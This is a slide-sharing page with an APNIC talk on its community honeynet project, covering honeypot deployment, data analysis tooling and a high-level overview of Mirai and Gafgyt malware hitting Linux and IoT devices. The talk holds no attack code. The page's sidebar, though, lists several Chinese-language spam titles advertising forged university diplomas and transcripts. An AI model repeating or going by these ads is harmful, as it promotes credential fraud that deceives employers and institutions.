InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
APNIC
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
APNIC
 
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
APNIC
 
2015_01 - Networking Session - SPHMMC ICT workshop
2015_01 - Networking Session - SPHMMC ICT workshop2015_01 - Networking Session - SPHMMC ICT workshop
2015_01 - Networking Session - SPHMMC ICT workshop
Kathleen Ludewig Omollo
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdwebuploader
 
Palo Alto Networks Sponsor Session
Palo Alto Networks Sponsor SessionPalo Alto Networks Sponsor Session
Palo Alto Networks Sponsor Session
Splunk
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
InfosecTrain
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
Priyanka Aash
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
Andrew Case
 
RenasCON 2023: Learning from honeypots
RenasCON 2023: Learning from honeypotsRenasCON 2023: Learning from honeypots
RenasCON 2023: Learning from honeypots
APNIC
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014
Flavio Eduardo de Andrade Goncalves
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat Security Conference
 
FreeBSD and Hardening Web Server
FreeBSD and Hardening Web ServerFreeBSD and Hardening Web Server
FreeBSD and Hardening Web Server
Muhammad Moinur Rahman
 
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network SecurityMMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
APNIC
 

Similar to IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project (20)

Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Threat hunting on the wire
Threat hunting on the wireThreat hunting on the wire
Threat hunting on the wire
 
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
InfoSec Taiwan 2023: APNIC Community Honeynet Project — Observations and Insi...
 
Threat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my HoneypotsThreat Con 2021: What's Hitting my Honeypots
Threat Con 2021: What's Hitting my Honeypots
 
Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014Anatomy of a Drupal Hack - TechKnowFile 2014
Anatomy of a Drupal Hack - TechKnowFile 2014
 
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
IX 2020 - Internet Security & Mitigation of Risk Webinar: Linux Malware and D...
 
2015_01 - Networking Session - SPHMMC ICT workshop
2015_01 - Networking Session - SPHMMC ICT workshop2015_01 - Networking Session - SPHMMC ICT workshop
2015_01 - Networking Session - SPHMMC ICT workshop
 
bh-us-02-murphey-freebsd
bh-us-02-murphey-freebsdbh-us-02-murphey-freebsd
bh-us-02-murphey-freebsd
 
Palo Alto Networks Sponsor Session
Palo Alto Networks Sponsor SessionPalo Alto Networks Sponsor Session
Palo Alto Networks Sponsor Session
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
 
Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)Unmasking Careto through Memory Forensics (video in description)
Unmasking Careto through Memory Forensics (video in description)
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
RenasCON 2023: Learning from honeypots
RenasCON 2023: Learning from honeypotsRenasCON 2023: Learning from honeypots
RenasCON 2023: Learning from honeypots
 
No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014No More Fraud, Astricon, Las Vegas 2014
No More Fraud, Astricon, Las Vegas 2014
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 
FreeBSD and Hardening Web Server
FreeBSD and Hardening Web ServerFreeBSD and Hardening Web Server
FreeBSD and Hardening Web Server
 
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network SecurityMMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
MMIX Peering Forum and MMNOG 2020: Packet Analysis for Network Security
 

More from APNIC

APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
APNIC
 
APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC
 
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
APNIC
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
APNIC
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
APNIC
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
APNIC
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
APNIC
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
APNIC
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
APNIC
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
APNIC
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
APNIC
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
APNIC
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
APNIC
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
APNIC
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APNIC
 

More from APNIC (20)

APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...
 
APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27APNIC Updates presented by Paul Wilson at CaribNOG 27
APNIC Updates presented by Paul Wilson at CaribNOG 27
 
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
APNIC Policy Roundup presented by Sunny Chendi at TWNOG 5.0
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53APNIC Updates presented by Paul Wilson at ARIN 53
APNIC Updates presented by Paul Wilson at ARIN 53
 
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024
 
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...
 
On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024On Starlink, presented by Geoff Huston at NZNOG 2024
On Starlink, presented by Geoff Huston at NZNOG 2024
 
Networking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOGNetworking in the Penumbra presented by Geoff Huston at NZNOG
Networking in the Penumbra presented by Geoff Huston at NZNOG
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119draft-harrison-sidrops-manifest-number-01, presented at IETF 119
draft-harrison-sidrops-manifest-number-01, presented at IETF 119
 
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
Making an RFC in Today's IETF, presented by Geoff Huston at IETF 119
 
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
IPv6 Operational Issues (with DNS), presented by Geoff Huston at IETF 119
 
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
Is DNS ready for IPv6, presented by Geoff Huston at IETF 119
 
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...
 
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85
 
NANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff HustonNANOG 90: 'BGP in 2023' presented by Geoff Huston
NANOG 90: 'BGP in 2023' presented by Geoff Huston
 
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff HustonDNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
DNS-OARC 42: Is the DNS ready for IPv6? presentation by Geoff Huston
 
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, ThailandAPAN 57: APNIC Report at APAN 57, Bangkok, Thailand
APAN 57: APNIC Report at APAN 57, Bangkok, Thailand
 

Recently uploaded

Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
cuobya
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
harveenkaur52
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
3ipehhoa
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
zoowe
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
CIOWomenMagazine
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
Gal Baras
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
SEO Article Boost
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
Danica Gill
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
3ipehhoa
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
JeyaPerumal1
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
vmemo1
 

Recently uploaded (20)

Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
 

IBCAST 2021: Observations and lessons learned from the APNIC Community Honeynet Project

  • 1. 1 Observations and Lessons Learned from the APNIC Community Honeynet Project Adli Wahid Senior Internet Security Specialist, APNIC adli@apnic.net
  • 2. 2 2 Let’s Connect! LinkedIn: Adli Wahid Email: adli@apnic.net Twitter: @adliwahid PGP Key fingerprint = 0CA9 A0A3 42C0 241E 6AE9 B24C 53F7 CE5C 6352 3696
  • 3. 3 3 Talk Overview 1. APNIC Community Honeynet Project 2. Observations on activities targeting Linux servers and IoTs 3. Lessons Learned / Reflections
  • 4. 4 4 Overview of the APNIC Community Honeynet Project
  • 5. 5 5 APNIC Community Honeynet Project • Context – Educational – using honeypots for understanding network security attacks / threats, part of our network security training – Situational awareness, the bigger picture, cooperation with other stakeholders, tools (i.e. MISP threat sharing platform, Wireshark, Suricata, etc ) • Collaboration – Partners deploy honeypots, APNIC runs the backend – Information collected among partners & threat sharing* • Outcomes – More than 50 distributed honeypots* in AP region since 2017 – Share threat information for APNIC members, partners (i.e CERTs/CSIRTs, Network Operators) • https://blog.apnic.net/2020/07/09/apnic-community-honeynet-project-behind- the-scenes/ • https://dash.apnic.net 5
  • 6. 6 6 APNIC Community Honeypot 1. Purpose and Placement o Research & Alerting – Internet 2. Type of Honeypots o Cowrie, Dionaea, RDPHoney, 3. Deployment – Community Honey Network (fork of Modern Honey Network) – Partners & Self Hosting 4. Data Collection & Analysis & Action – Logs, Visualization, Alert, Action (Incident Response) – Elasticsearch, Kibana, Logstash, Beats – Suricata IDS – ElastAlert + Slack 5. Maintenance – Ansible – LibreNMS Detection with Suricata Rulesets Slack Alert
  • 7. 7 7 Community Honeynet Infrastructure hpfeeds hpfeeds CHN MHN Filebeats (json) Filebeats (json) Logstash TLS TLS ElasticSear ch BigQuery Elastalert Kibana honeypots Distributed honeypots MHN – Modern Honey Network CHN – Community HoneyNetwork
  • 8. 8 8 * Traffic from the last 30 days
  • 9. 9 9
  • 10. 10 10
  • 11. 11 Country View – Pakistan (Last 90 days)
  • 13. 13 13 Linux/Unix Malware • Routers / IoT devices / Servers run Linux / Unix based OS • Not new but pervasive – Targets are exposed on the Internet (http, telnet, ssh) – Unpatched / Unmonitored (i.e. no Anti Virus, firmware upgrades not applied) – Default/Weak credentials • Popular example – Mirai (ddos agent) – Source code was shared publicly – Many variants – josho, owari, masuta, sora etc – Gafgyt • Simple technique of infecting and spreading & persistence • Interesting Scenarios – Working from Home – Servers / Hosting / Cloud
